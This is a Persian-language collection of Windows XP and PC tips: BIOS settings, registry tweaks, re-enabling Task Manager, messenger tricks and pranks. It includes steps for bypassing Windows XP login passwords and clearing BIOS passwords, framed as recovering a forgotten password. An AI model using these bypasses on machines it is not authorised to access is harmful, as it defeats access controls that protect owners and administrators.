Mouse Power ON : [Enable / Disable
]
اینکه وقتی کلیک دکمه چپ ماوس کلیک گردد سیستم روشن شود .
Modem Ring resume : [Enable / Disable ]
این گزینه اگر فعال باشد ، اگر مودم شما به خط تلفن متصل باشد و کسی با شما تماس بگیرد سیستم روشن می شود
۵) Pnp/PCI Configuration
۵) پیکربندی و تنظیمات مربوط به دستگاههای
PCI : Peripheral Compounent Interconnect

و
PNP : Plug & Play
دستگاهای
PCI دستگاههایی هستند که از طریق اسلات ( شکاف) های PCI به مادربورد متصل می شوند . مانند مودم ، تی وی کپچر و یا کارت صوت
در این بخش هرکدام از شکافهای (
Slot) مادربورد را میتوان تنظیم کرد که از کدام شماره وقفه(IRQ) استفاده کند .
بهتر است گزینه
Auto را انتخاب کنیم تا سیستم به طور اتوماتیک شماره وقفه به دستگاهها نسبت دهد .
۶) PC Health Status یا H/W Monitor
۶) وضعیت سلامتی سیستم
این بخش نمایانگر وضعیت کلی سیستم شامل سرعت فنها ، دمای جاری سیستم و پردازنده ، ولتاژ پردازنده و ... میباشد .
در بعضی از سیستمها در این بخش گزینه های زیر نیز وجود دارند :
Chassis Instruction : [Enable / Disable
]
عملکردهای جانبی کِیس مانند باز بودن درب
CPU Smart Fan Target : [Disable / Level ۱ / … / Level ۵ ]
تنظیم اتوماتیک سرعت فن پردازنده در دمای زیاد
CPU Fan Fail Warning : [Enable / Disable
]
هشدار در هنگام خرابی یا عملکرد بدِ فن پردازنده
CPU Temp Warning : [Disable / ۵۰ / ۶۰ / ۷۰ / ۸۰ ]
هشدار رسیدن دمای پردازنده به دمای خاص
CPU Temp Warning : [Enable / Disable ]
هشدار در هنگام خرابی یا عملکرد بد فن سیستم (کِیس)
۷) Frequency/Voltage Control
۷) کنترل ولتاژ و فرکانس
در این بخش می توان فرکانس کاری پردازنده و ولتاژ کاری رم و پردازنده و همچنین ولتاژ کارت گرافیکی متصل به شکاف
AGP
را تنظیم کرد .
این بخش بیشتر برای
OverClockکردن بکار میرود .
دستکاری این بخش بدون داشتن اطلاعات دقیق و کافی ممکن است باعث سوختن مادربورد ، پردازنده و یا کارت گرافیک گردد .
۸) Top Performance / Loaf Fail-Safe / Optimized Default

۸) تنظیمات اولیه و تنظیمات کارا
این بخش که با سه نام ذکر شده بالا در دسترس است شامل تنظیمات پیش فرض و اولیه کارخانه سازنده و همچنین پیش تنظیمات پیشنهادی شرکت سازنده میباشد .
به برخی از گزینه های رایج آن میپردازیم :
Load Fail-Safe Default
:
بارگزاری تنظیمات پیش فرضی که از برخی از قابلیتهای مادربورد چشمپوشی می کند .
Top Performance & Optimized Default :
بارگزاری تنظیمات پیش فرضی که بیشترین کارایی مادربورد سیستم را بهمراه دارد.
۹) BIOS Setting Password - Set Supervisor & User Password
۹) کلمه عبور تنظیمات بایوس / تنظیم کلمه عبور کاربر
در این بخش میتوان برای ورود به سیستم و یا ورود به تنظیمات بایوس کلمه عبور گذاشت .
با تنظیم
System Password یا User Password
می توان برای بالا آمدن سیستم یک کلمه عبور گذاشت تا کسی نتواند بدون مجوز از کامپیوتر استفاده کند .
با تنظیم
Supervisor Password می توان برای ورود به بخش تنظیمات بایوس کلمه عبور قرار دادر .
ـ نکته : با برداشتن باطری روی مادربورد این دو کلمه عبور پاک خواهند شد و کلیه تنظیمات به حالت اولیه ( تنظمات کارخانه) برمیگردد .
۱۰) Save And Exit
۱۰) ذخیره و خروج از بایوس
در بیشتر موارد با زدن کلید
F۱۰
تغییرات اعمال شده در بایوس ذخیره می شود و سیستم ری استارت و آماده کار خواهد شد .
در بعضی از مادربوردها هم بایستی گزینه
Save And Exit
را برای ذخیره و خروج انتخاب کرد .
گزینه
Exit Without Saving نیز موجب خروج از بخش تنظیمات البته بدون ذخیره تغییرات اعمال شده میگردد

روش های فعال کردن folder option / رجیستری / task manger

از قرار معلوم این مشکلات در بین کاربران زیاد شده و با اینکه جوابهای مختلفی داده شده دوباره سوال میشه این تاپیک رو زدم که کل مطالب این بخشها را یکجا بگم

در کل غیر فعال شدن این موارد به دو علت میتونه باشه : 1- آلوده به ویروس یا تروجان یا بد افزارها و کرمهای رایانه ای 2- مدیر سیستم به خواست خودش این گزینه ها را غیرفعال کرده

اگر گزینه دوم باشه که خوب حرفی نیست مدیر سیستم و شبکه اینطور خواسته باشه و اگر مدیر شبکه به اندازه کافی موارد ایمنی را رعایت کرده باشه نمی تونید این گزینه ها را خنثی کنید یا فعال کنید.

اما اگر بخاطر آلودگی سیستم باشه برای فعال کردن این گزینه ها دو راه کار کلی دارید.
اول از طریق سیاست ها (
policy) و دوم از طریق رجیستری (registery
) (راه حل دوم در صورتی که رجیستری غیر فعال نشده باشد قابل استفاده می باشد)

فعال کردن از طریق سیاست ها (
policy)
ابتدا به محیط
Group policy بروید. برای اینکار در منوی run عبارت gpedit.msc را تایپ کنید و Ok کنید. حال پنجره باز شده شامل دو قسمت چپ و راست میباشد که در سمت چپ آیتم ها به صورت درختی لیست شده اند که با کلیک روی علامت + زیر مجموعه آن باز میشود و با هر بار کلیک روی هر یک از این آیتم ها زیر مجموعه این آیتم در سمت راست نمایش داده میشود.

- برای فعال کردن
task manager این مسیر را برید:

User Configuration > Administrative Templates > system >Ctrl+Alt+Del options


حال در پنجره سمت راست گزینه remove task manager را می بینید. روی این گزینه دوبار کلیک کنید و گزینه disable را انتخاب کنید و سپس ok کنید.

- برای فعال کردن ابزار رجیستری این مسیر را برید:

User Configuration > Administrative Templates > system

در این حالت در پنجره سمت راست گزینه Prevent access to registery tools را می بینید. روی این گزینه دوبار کلیک کنید و گزینه disable را انتخاب و سپس Ok کنید.


- برای فعال کردن
folder option این مسیر را برید:

User Configuration > Administrative Templates > Windows Components > Windows Explorer

حال در پنجره سمت راست گزینه Removes the Folder Options menu item from the tools menu را دوبار کلیک کنید و گزینه disable را انتخاب و سپس ok کنید.

حال پنجره
Group policy را ببندید و برای اینکه این policy های که تغییر داده اید اعمال شود در منوی run این فرمان را وارد کنید:

gpupdate /force

و یا اینکه یکبار سیستم را ریست کنید.
تمام گزینه های فوق فعال میشوند. اگر تنها یک بخش از موارد فوق را لازم داشتید فقط برای همان بخش را انجام دهید.


استفاده از رجیستری برای فعال کردن
task manager و یا folder option

این روش ساده تر بنظر میرسه و لازمش بهمراه داشتن فایل رجیستری هست. برای اینکار یکبار فایل برای هر یک از دو مشکل بالا فایل رجیستری تهیه میکنید و بعد از آن همیشه استفاده می کنید. برای این کار برنامه
notepad را اجرا کنید. یکی از موارد ذیل را کپی و در برنامه paste کنید و در هنگام ذخیره کردن اسم فایل اختیاری اما پسوند فایل باید reg باشد ( بطور مثال EnableTaskManager.reg برای taskmanger بذارید)

برای
task manager این 4 خط را کپی و در برنامه فوق paste کنید:

Windows Registry Editor Version 5.00

[
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System]
"
DisableTaskMgr"=dword:00000000


رجیستری برای folder option
مثل قبل فایل را ذخیره کنید:

Windows Registry Editor Version 5.00

[
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer]
"
NoFolderOptions"=dword:0000000

[
HKEY_CURRENT_USER\Software\Policies\Microsoft\Inte rnet Explorer\Restrictions]
"
NoBrowserOptions"=dword:00000000

 

حذف کلید هایی که در رجیستری پاک نمیشوند

ممکن است تا به حال برایتان پیش آمده باشد که قصد پاک کردن کلیدی در رجیستری را داشته اید اما به هیچ طریقی موفق به حذف آن نشدید. این موضوع به ویژه بعد از Uninstall کردن بعضی از برنامه ها پیش میاید که بعد از پاک کردن برنامه کلیدهای رجیستری آن پاک نمیشود. ممکن است حتی برای اینکار دست به دامن نرم افزارهای مخصوص تعمیر رجیستری هم شده اید اما موفقیتی حاصل نشده. این مشکل راه حلی ساده دارد که در این ترفند به معرفی آن خواهیم پرداخت.
برای اینکار:
کافی است ابتدا رجیستری را باز کنید. (از منوی
Start وارد Run شده و دستور regedit را وارد کرده و Enter بزنید.)
سپس کلید
Key مورد نظر را بیابید و بر روی آن راست کلیک نموده و Permissions را انتخاب کنید.
در پنجره باز شده ، از کادر بالایی یعنی
Group or user names ، (ترفندستان) هر یک از گروه های کاربری را انتخاب کنید.
پس از انتخاب ، از کادر پایینی در قسمت
Full Control تیک Allow را بزنید.
این کار را برای تمام گروه های موجود در
Group or user names انجام دهید.
OK کرده و خارج شوید.
اکنون میتوانید
Key مورد نظر را بدون مشکل پاک کنید.

 

ویرایش رجیستری در سیستم های تحت شبکه

در صورتی که در حیطه کاری شما چندین کامپیوتر به شکل یک شبکه محلی با همدیگر در ارتباط اند ، شما برای ایجاد یک تغییر در رجیستری کلیه سیستم ها چه میکنید؟ آیا به سراغ تک تک سیستم ها میروید و تغییرات رجیستری هر یک را جداگانه اعمال میکنید؟ اما راه بسیاری ساده تری نیز وجود دارد. شما میتوانید بدون نیاز به برنامه خاصی و از طریق خود محیط رجیستری و به وسیله سیستم مدیر شبکه ، از طریق یک کامپیوتر تنظیمات رجیستری کلیه کامپیوترهای متصل به شبکه را ویرایش کنید. هم اکنون به معرفی این ترفند خواهیم پرداخت.
بدین منظور:
دقت کنید همانطور که گفته شد شما باید با نام کاربری مدیر در سیستم لوگین کرده باشید و دسترسی کامل به سایر سیستم ها را داشته باشید.
ابتدا از محیط
Start وارد Run شده و عبارت regedit را وارد کرده و Enter
بزنید تا وارد محیط ویرایشگر رجیستری شوید.
از (ترفندستان) منوی
File بر روی Connect Network Registry کلیک کنید.
خواهید دید که پنجره
Select Computer باز میگردد.
در این پنجره و در قسمت
Enter the object name to select نام کامپیوتری که قصد تغییر رجیستری در آن دارید را وارد کنید.
با کلیک بر روی (
Examples) نیز میتوانید نحوه نام دهی را مشاهده کنید.
پس از اینکار روی
OK کلیک کرده تا پنجره رجیستری مربوط به سیستم مورد نظر باز گردد.
حال میتوانید تغییرات مورد نظر در رجیستری سیستم مربوطه را صورت دهید.

در پایان پس از انجام تغییرات لازم ، برای قطع ارتباط با کامپیوتر مربوطه ، از منوی
File گزینه Disconnect Network Registry را انتخاب کنید.
نام کامپیوتری که به آن وصل بوده اید را انتخاب کرده و
OK بزنید تا ارتباط قطع گردد.

دقت کنید در این ترفند به علت تغییرات در رجیستری ، پیش از هر کاری از رجیستری خود Backup بگیرید.

 

رفع مشکل مشاهده صفحات Save شده توسط IE7

ممکن است شما نیز از کابرانی باشید که برای مرور صفحات وب از Internet Explorer 7 میکنند. در این صورت احتمالأ به این موضوع برخورده اید که صفحه ای را بر روی هارد Save میکنید اما به هنگام باز کردن این فایل ذخیره شده کاراکترهای نامفهومی به جای فایل شما نمایان میشود. علت این موضوع چیست؟ در این ترفند قصد داریم به معرفی راه حل این مشکل ساده بپردازیم.
فایل هایی که این مشکل برای آنها پیش میاید همگی فایل هایی هستند که به مانند ترفندستان ، عنوان هایی فارسی دارند. در نتیجه این مشکل برای آنها پیش میاید.
برای حل این مشکل ساده کافی است به هنگام ذخیره فایل
html ، نام فارسی را پاک کرده و عنوانی دلخواه به انگلیسی مثلأ Tarfandestan را وارد نمایید و صفحه را Save کنید.
از این پس برای باز کردن فایلهای اینچنینی مشکلی نخواهید داشت.
همچنین اگر فایل خود را قبلأ ذخیره کرده اید میتوانید با تغییر نام آن به انگلیسی مشکل را حل کنید.

 

نفوذ به ویندوز ایکس پی

یکی از مشکلات ویندوز xp راه نفوذ به آن در صورت فراموش کردن password می باشد .

همانطور که همه شما می دانید xp امکان جالب switch user را دارد که می توان محیط را برای کار user های مختلف فراهم کرد
.

.
حالا اگر شما این password را فراموش کنید چاره چیست؟


در این حالت چند راه نفوذ هست و آن این است که در هنگام ظاهر شدن منوی کاربران در ابتدا:

دو بار کلیدهایALT+CTRL+ DELETE را فشار دهید سپس در قسمت نام کلمه administrator را تایپ کرده و قسمت password را خالی بگذارید و Ok را بزنید در این حال وارد سیستم می شوید
.


2.
حال اگر در هنگام نصب ویندوز Xp برایAdmin پسورد گذاشته باشند چه کار کنیم؟



برای این کار قبل یا هنگام بالا آمدن ویندوز کلید F8 را زده سپس بسته به نوع نیاز خود بکی از گزینه های Safe Mode را انتخاب کنید.


بعد از وارد شدن به ویندوز در منو Start کلیک کنید سپس گزینه RUN را انتخاب کرده ودر جای خالی

عبارت Control userpasswords2 را تایپ کنید.


پنجره باز شده دارای 2 TAB به نام هایUsers & Advanced می باشد
.


TAB Users را انتخاب کرده و تیک گزینه:User must enter a username and password to use this computer را بردارید



با برداشتن تیک این گزینه دیگر هنگام ورود به ویندوز از شما پسورد گرفته نمی شود.

حالا با استفاده از گزینه Add می توان نام کاربری را به آن اضافه و با استفاده از گزینه Remove می توان نام کاربری را حذف کرد
.


همچنین با استفاده از گزینه Properties می توان میزان دسترسی کاربران به ویندوز را تعیین کرد.

منبع:metal-melody.8m.net

 

شاخه غیر قابل باز شدن بسازید

کاربرد در سیستم عاملهای : ۹۸ , ME
برای پنهان کردن محتوی یک Folder به نحوی که در محیط ویندوز قابل دسترس نباشد به شکل زیر عمل کنید :
1)
به محیط داس رفته و شاخه مورد نظر خود را با دستور REN ، فاصله ، نام فعلی شاخه ، یک فاصله دکمه ALT را نگه داشته و یکی از اعداد ۱۷۶ یا ۲۴۹ یا ۲۵۱ را از قسمت ماسین حساب صفحه کلید تایپ کنید سپس دکمه ALT را رها کرده و Enter را بزنید


نکته ۱: توجه کنید که شاخه هایی که به این ترتیب ایجاد میشوند در WIN XP و WIN 2000 در دسترس خواهند بود .
نکته ۲: برای برگرداندن شاخه به حالت قبلی خود دوباره به داس رفته و با استفاده از فرمان REN نامی عادی را برای شاخه انتخاب کنید .

منبع:metal-melody.8m.net

 

لگین کردن همزمان با چندین آیدی بدون نرم افزار

در این ترفند شما میتوانید بدون استفاده از هیچ نرم افزاری به طور همزمان چندین Yahoo Messenger را باز کرده و در هر کدام با یک ID متفاوت وارد شوید. (این ترفند برای تمام نسخه ها و آخرین نسخه که 9 میباشد جواب میدهد)

 

1 - از منوی Start پنجره ی Run را باز کرده و regedit را تایپ کنید
2 - در پنجره باز شده از سمت چپ به قسمت زیر بروید:

HKEY_CURRENT_ USER ——–> Software —>yahoo —–>pager—->Test

3 - در سمت راست در جای خالی right click کرده و new Dword value را انتخاب کنید
4 - و نام آن را
Plural بگذارید
5 - روی آن
Double click کرده و مقدار 1 را بدهید و Decimal را انتخاب کرده Ok کنید و از Registry Editor خارج شوید

کار با موفقیت انجام شد و حال میتوانید یک یاهو مسنجر را باز کرده و با یکی از ID های خودتان وارد شوید و بعد یاهو مسنجر دیگری باز کنید و با ID دیگری وارد شید.

توجه : قبل از login کردن یاهو مسنجر دیگری را باز نکنید.

 

با ایرانسل رایگان چت کنید؟

سیم کارت های ایرانسل به دلیل نوآوری های متعدد و تبلیغات گسترده و به ویژه قیمت پایین توانسته است حضور موفقی را در عرصه مخابراتی کشور داشته باشد و با استقبال گسترده مردم روبرو شده است. چرا که دیگر شما تنها با 15 هزار تومان یک خط خواهید داشت! به همین دلیل ابتکارات و ویژگی های منحصر به فرد این سیم کارت ها ، مشکلات و نقص هایی که ایرانسل به همراه دارد نیز به نوعی مخفی شده است. علاوه بر توانمندی هایی همانند GPRS و MMS ، ایرانسل قابلیتهای دیگری هم دارد که بسیاری از افراد از آنها بی خبرند. یکی از قابلیتهای فوق العاده ایرانسل که به تازگی ایجاد شده است ، SMS Chat Zone نام دارد. ابزاری که شاید همینک با معرفی آن شما را به خرید یک سیم کارت ایرانسل وسوسه کند! SMS Chat Zone ابزاری است کاملأ رایگان و مجانی که به وسیله آن میتوانید یک ابزار چت کامل را از طریق SMS Chat روی گوشی خود داشته باشید. توسط SMS Chat Zone شما میتوانید با دوستان خود که ایرانسل دارند چت کنید ، دوستان جدیدی را جستجو و پیدا کنید ، از اتاق های چت استفاده کنید و در کل یک محیط چت کامل را روی گوشی خود داشته باشید. همچنین توسط SMS Chat Zone ، شما میتوانید پیام ها و آفلاین های دریافتی در یاهو مسنجر را هم به صورت SMS روی گوشی خود دریافت کنید که خود این موضوع نیز بسیار جالب است! در این ترفند قصد داریم به معرفی نحوه کامل استفاده از SMS Chat Zone به طور کامل بپردازیم.    

 

یک ترفند برای جلوگیری از انتشار ویروس

بعضی از ویروس ها به وسیله Forward کردن خود به آدرس های موجود در کتابچه آدرس پست الکترونیکی (email) آلوده به ویروس، انتشار می یابند. شما می توانید با افزودن یک آدرس پست الکترونیکی نادرست جلوی این کار را بگیرید. این آدرس باید دارای یک کاراکتر غیر قابل قبول باشد، مثلا کاراکتر(!). حال برای اینکه این آدرس را به عنوان اولین آدرس خود قرار دهید، آن را با عدد یک شروع کنید. به عنوان مثال:

1(!)bestlive4u@yahoo.com

منبع:saeedsecret.tripod.com

 

همیشه هم Google بهترین نیست !

هروقت صحبت از Search و جستجو به میان می آید بی شک این نام گوگل است که ابتدا در ذهن نقش می بندد و سپس شما نام Google را در مرورگر خود تایپ می کنید و سپس کلیدهای Ctrl + Enter را می فشارید و پس از ورود به صفحه اصلی سایت ، اقدام به جستجوی مرتبط با موضوع خود می کنید …
محیط ساده ، زیبا ، بی آلایش و در عین حال سریع گوگل و نتایج قابل قبول این موتور جستجو ، همگی باعث شده است تا گوگل یک سر و گردن از دیگر موتورهای جستجو بالاتر باشد .

اما دست نگه دارید …. با تمام علاقه ای که به گوگل دارم (و حتما شما هم دارید) قصد داریم موردی را ذکر کنیم که اینبار Yahoo! است که بهتر از Google عمل می کند و نتایج بسیار بهتری را به شما نمایش می دهد …

 

شاید شما نیز اطلاع داشته باشید که دو نوع حرف ” ی / ى ” و دو نوع حرف ” ک / ک” در استاندارد صفحه کلیدهای ویندوز داریم …

یک نوع ی و ک عربی است که مشخصه آن این است که در زیر حرف ی دو نقطه و در بالای حرف ک سرکش وجود دارد (به طور مثال مطلبی که هم اکنون تایپ شده است با حروف ی و ک عربی است )

و یک نوع ک و ى دیگر پارسی است یعنی ى بدون دونقطه و ک بدون سرکش است .
مطمئنا این موضوع در هنگام تایپ مطلب و مشاهده توسط کاربران ، اصلا مهم و تاثیر گذار نیست …

اما شاید ندانید که همین مسئله یکی از مشکلات متون تایپی فارسی در اینترنت است ، زیرا موتورهای جستجو بین این دو حرف تفاوت قائل می شوند و هر کدام از این نوع حروف را یک کاراکتر جداگانه در نظر می گیرند .
به طور مثال اگر شما عبارت یک ایرانی را در گوگل جستجو کنید بسته به استاندارد کیبورد ویندوزتان و اینکه چه نوع ک و ی ای را تایپ کرده باشید ، نتایج متفاوتی را مشاهده خواهید کرد
باور نمی کنید ؟
تست کنید :
 

خوب حتما حالا متوجه کل قضیه شدید ….
بله همین موضوع باعث می شود تا بسیاری از متون فارسی در نتایج جستجوی کاربران در موتورهای جستجو نمایان نشود .
اما شاید نمی دانستید که موتور جستجوی
Yahoo بر خلاف Google بین این دو حرف تفاوتی قائل نیست و به طور اتوماتیک حروف ی و ک عربی را به ى و ک فارسی تبدیل می کند و نتایج یکسانی را به شما نمایش می دهد .

تست کنید :
 بنابراین پیشنهاد می کنیم اگر قصد جستجوی عبارات فارسی را دارید و مخصوصا در آن از یکی از کاراکترهای ک/ی استفاده شده است علاوه بر جستجوی خود در گوگل آن را در موتورجستجوی
Yahoo نیز Search کنید .

پانوشت :

اگر به دنبال عبارت فارسی خاصی در سایت ویکیپدیای فارسی می گردید این نکته نیز در ویکیپدیا لحاظ شده است و تفاوتی بین حروف ک/ی ندارد و در نهایت نایج یکسانی را مشاهده خواهید کرد

امید آن داریم تا Google نیز چنین قابلیتی را در نتایج جستجوی خود لحاظ کند تا دیگر هیچ ایرادی نتوان به آن وارد کرد … (دوست همیشه داشتنی = گوگل)

 

ترفند های جالب کامپیوتری ( قسمت پنجم )

همه چیز درباره رایانه تان
گاهی اوقات اتفاق می افتد که شما به دلایل مختلفی نیاز به دانستن اطلاعاتی راجع به سیستمتان دارید . در این مواقع داشتن یک مرجع به سیستمتان دارید . در این مواقع داشتن یک مرجع نیبتا کامل براحتی قابل دسترسی باشد موهبت است .
ما روشی برای دسترسی به این منبع را به شما ارائه می دهیم . کافی است گزینه
Run از منوی start را اجرا کرده و در قسمت Open عبارت Msinfo32 را وارد کنید . پنجره ای در برابرتان ظاهر می شود که شامل بخشهای مختلفی است و اطلاعات کاملی از خلاصه سیستم شما از قبیل نوع پردازنده و میزان حافظه و … تا اطلاعات کاملی درباره هر کدام از پورتهای سریال موازی و دهها مطلب دیگر …
درایوهایتان را پنهان کنید
با این ترفند می توانید ظاهر ویندوزتان را به مقدار قابل توجهی و به صورت دلخواهتان تغییر دهید . ترفند این شماره درباره پنجره
My computer است . شاید دلتان بخواهد شمایل تمامی درایوهایتان را از پنجره My computer پنهان کنید . پس از آن شما می توانید برای دسترسی به درایوها از منوی RUN استفاده کنید . برای این کار باید وارد محیط رجیستری ویندوزتان شوید و مسیر زیر را در ستون سمت چپ دنبال کنید :
Hkey-Current-User\Software\Microsoft\Windows\Current Version\Policies\Explorer
حال ستون سمت راست را گزینه
NoDrives را از نوع Dword ایجاد کنید . دقت کنید که حروف D وN به صورت بزرگ نوشته شود . حال آن را انتخاب کنید و مقدار آن را به ۳FFFFFF تغییر دهید . پس از انجام این کار از محیط رجیستری خارج شوید و پنجره My computer را باز کنید . دیگر درایوتان را در آن نمی بینید .
صرفه جویی در جوهر چاپگر
امروزه در بسیاری از منازل در کنار
PC ها پرینتر نیز دیده می شود.شاید بسیاری از شما که در حال مطالعه این مطلب هستید در منازل یا مل کار خود این وسیله را داشته باشید .
در کنار مزایای بسیاری که داشتن پرینتر داراست یکی از مشکلاتی که دارندگان پرینتر با آن مواجه هستند قیمت نسبتا گران جوهر پرینتر است .
روشهایی برای صرفه جویی و استفاده بهینه از جوهر پرینتر وجود دارد . فرض کنید که می خواهید فقط قسمتی از صفحه وب خود پرینت بگیرید و به بقیه صفحه مورد نظر نیازی ندارید . شاید در حالت عادی تصور کنید که یا مجبورید که از تمامی صفحه خود پرینت بگیرید ویا این که قسمت مورد نظر را انتخاب کرده و در داخل محیط
wordpad ببرید و سپس از آن پرینت بگیرید .
ولی دست نگه دارید روش آسان تری نیز وجود دارد کافی است بخش مورد نظرتان را که حاوی عکس یا متن است انتخاب کنید و از منوی‌
File گزینهPrint را انتخاب کنید و در پنجره ظاهر شده در بخش Page Range گزینهSelection را انتخاب کنید و در نهایت پس از تایید این پنجره خواهید دید پرینتر شما از قسمت انتخاب شده پرینت می گیرد .
آدرس سایتها را سریعتر وارد کنید
شما هم حتما از نوشتن نشانی های طولانی که با
www آغاز می شوند و به پسوندهای متفاوتی مانند com ختم می شوند خسته شده اید در این مقاله روشی را برای آسان سازی نوشتن این گونه نشانی ها به شما پیشنهاد می کنیم . برای کار موارد زیر را دنبال کنید : اگر نشانی شما شما پسوند com داشته باشد کافی است تنها Domain نشانی را تایپ کنیدو کلیدها Ctrl+Enter را همزمان فشار دهید . به عنوان مثال برای وصل شدن به www.shirazpatogh.com فقط کافی است shirazpatogh را تایپ کنید و کلیدهای فوق را همزمان فشار دهید . خواهید دید که بطور خود کار نشانی کامل را پیدا می کند. دوم اینکه اگر پسوند آن را نمی دانید تنها کافی است Domainنشانی را تایپ کنید و کلید Enter را فشار دهید . Internet Explorer سعی می کند سایت مورد نظر را با بررسی پسوند ها ی متفاوت پیدا کند . سوم اگر شما نیاز به ویرایش یک نشانی طولانی دارید می توانید با استفاده از Ctrl+Left arrow و یا Ctrl+Right arrow بین بخشهای متفاوت یک نشانی حرکت کنید و پس از رسیدن به بخش مورد نظر آن را ویرایش کنید

منبع:shahvar.net

 

مشاهده آنلاین فیلم جنگ ستارگان با اینترنت ذغالی در محیط DOS

قصد داریم تا یک ترفند بسیار جالب برای شما معرفی کنیم. با استفاده از این ترفند میتوانید فیلم معروف جنگ ستارگان Star Wars را به شکلی بسیار دیدنی از طریق ویندوز XP و با اتصال به اینترنت ببینید. در این ترفند نیازی به اینترنت پر سرعت نیست ، بلکه با استفاده از همین اینترنتهای ذغالی خودمان نیز میتوان این فیلم را مشاهده کرد. تا انتهای ترفند را بخوانید تا متوجه این ویژگی بشوید!

بدین منظور:
از منوی
Start وارد Run
شوید.
اکنون عبارت
TELNET را در آن وارد کرده و Enter بزنید.
در صفحه باز شده ابتدا کلید
o را زده و Enter کنید. ( این حرف صفر نیست ها …حرف Oانگلیسی است )

اکنون عبارت towel.blinkenlights.nl را تایپ نموده و Enter بزنید.
چند ثانیه صبر کنید… اکنون میتوانید فیلم جنگ ستارگان را به طور جالب و دیدنی مشاهده کنید!

راستی این ترفند مخصوص ویندوز XP است .

 

ظاهر ویندوز XP دوستتان را زشت کنید !

حدود دو سال پیش بود که داشتم تو Help ویندوز ایکس پی می گشتم و میانبرهای مختلف ویندوز رو می دیدم .

در بین همه میانبرها چشمم به یک میانبر جالب افتاد …

بعد از استفاده از این میانبر ظاهر ویندوز ایکس پی در چند ثانیه کاملا تغییر می کند و به یک ویندوز ایکس پی کاملا زشت و با حروف بزرگ تبدیل می شود !

من تنها ۲ تا فایده برای این میانبر به ذهنم رسید …

۱- به دلیل بزرگ شدن فونتهای ویندوز مناسب برای افزاد مسن که قادر به تشخیص برخی از فونتهای کوچک نیستند می باشد و می توانند با استفاده از یک میانبر در صفحه کلید از این قابلیت استفاده کنند و متنون خود را به آسانی مشاهده کرده و سپس ظاهر ویندوز خود را به حالت اولیه باز گردانند .

۲- استفاده دیگری که میشه از این قابلیت کرد تنها برای شوخی با دوستتان است !

 

کافی است در یک لحظه این میانبر را اجرا کنید و ظاهر ویندوز دوستتان را زشت کنید … مطمئنا دوستتان از این کار تعجب خواهد کرد و شگفت زده خواهد شد و فکر میکند که شما ویندوز او را خراب کرده اید …

ولی شما می توانید با اجرای مجدد میانبر فوق ظاهر ویندوز را به حالت اولیه بازگردانید …

فکر می کنم استفاده مورد دوم خیلی بیشتر باشه !

 

این ترفند برای اولین بار در شاهوار دات نت معرفی می شود …

 

کافی سه کلید Alt+Shift+Print Screen را فشار دهید (دقت داشته باشید تنها کلیدهای Alt و Shift سمت چپ کیبورد برای این ترفند عمل خواهد کرد و اگر از کلیدهای Alt و Shift سمت راست کیبورد استفاده کنید این میانبر عمل نخواهد کرد)

سپس بوق کوچکی از داخل کیس به گوش خواهد رسید و پنجره ای مطابق شکل زیر نمایش داده می شود :

 

حال بر روی Ok کلیک کرده و چند ثانیه منتظر بمانید تا حسابی ظاهر ویندوز دوستتان به هم بریزه !

در صورتی که خواستید تا ظاهر ویندوز را به حالت اولیه بازگردانید ، کافی است میانبر را مجددا استفاده کنید …

خواهید دید که پس از چند ثانیه ظاهر ویندوز به حالت اولیه باز خواهد گشت .

اگر پس از بازگشت مجدد ظاهر ویندوز منوی استارت شما از لحاظ عرضی کمی بزرگتر شده بود لازم است تا یکبار ویندوز خود را Logoff کرده و یا Restart کنید تا به حالت اولیه بازگردد .

 

تایپ مطالب نامرئی در نرم افزار word !

حتما تا به حال در فیلمهای مختلف ، کاغذهایی را دیده اید که به ظاهر هیچ چیزی بر روی آن نوشته نشده است اما مثلا با گرم کردن کاغذ نوشته های آن پدیدار می گردد .
این نوشته ها که در حالت معمولی دیده نمی شوند ، بعضی مواقع کاربردهای جالبی خواهند داشت .
مثلا شما می توانید پیام تبریک جشن تولدتان را به این صورت برای دوستتان ارسال کنید .
مثلا برای ساخت چنین نوشته هایی کافی است متن مورد نظرتان را با آبلیمو بر روی کاغد معمولی  بنتویسید و از دوستتان بخواهید که کاغد را اتو کند و یا آن را بر روی یک شعله گرم کند تا نوشته های نامرئی ، مرئی شوند .
اما اینبار هدف ما ، استفاده از همین عمل در نرم افزار
Microsoft Word است !

 

با استفاده از این روش تمام یا قسمتی از نوشته های تایپی شما در حالت  معمول نمایش داده نمی شود و دوستتان باید برای نمایش متن مخفی شما عمل دیگری انجام دهد …ش

 

با استفاده از این روش تمام یا قسمتی از نوشته های تایپی شما در حالت  معمول نمایش داده نمی شود و دوستتان باید برای نمایش متن مخفی شما عمل دیگری انجام دهد …


برای اینکار ابتدا وارد برنامه Word شوید و سپس عبارات دلخواه خود را تایپ نمایید .

و سپس متنی را قصد مخفی سازی آن را دارید انتخاب کنید (عمل Drag) و بر روی آن کلیک راست نموده و گزینه Font را انتخاب نمایید (و یا به منوی Format مراجعه کرده و گزینه Font را برگزینید)

حال در بخش Effects گزینه Hidden را تیک بزنید :

حال برای انجام یک  جلوه ویژه به متن خود به   قسمت Text Effects  مراجعه کرده و یکی از گزینه های موجود را برگزینید . و سپس بر روی Ok کلیک کنید  .

 

حال مشاهده  می کنید که عبارتی که انتخاب کرده بودید ، مخفی شده و قابل نمایش نیست .

راحت ترین راه برای نمایش  متن مخفی شده شما ، توسط دوستتان کلیک بر روی دکمه ای است که در شکل زیر نمایش داده شده است .

در صورت کلیک بر روی این دکمه می بایست متن مخفی شده خود را به همراه جلوه ویژه ای که به متن خود داده بودید مشاهده کنید :

 

منبع:shahvar.net

 

از کار انداختن رمز عبور BIOS

میتوانید باتری دستگاهتان را که روی مادربرد است درآورده و دوباره جا بیاندازید در این حالت تمام اطلاعات CMOS به حالت پیش فرض برمیگردد. فقط یه اتصال بین دو اهن درون جای باطری برقرار کنید


منبع:2
fon-gsm.com

 

مسدود کردن آدرسهایی که نمی خواهیم از جانب آنها ایمیلی برسد

برای استفاده از این  ترفند  ابتدا از mail.yahoo.com میل خود را باز کنید . بدین منظور روی لینک Options کلیک کنید. (گوشه ی بالا سمت راست ) در صفحه بعد روی لینک   Block Addresses بروید. در این صفحه در قسمت Add Block ایمیل فردی را که میخواهید از طرف  او ایمیلی برای شما نیاید را وارد کنید تا او بلاک شود. در حال حاضر شما تا 500 نفر را میتوانید مسدود کنید.

 

چگونه می توان از داده های بیشتری در شبکه استفاده کرد؟

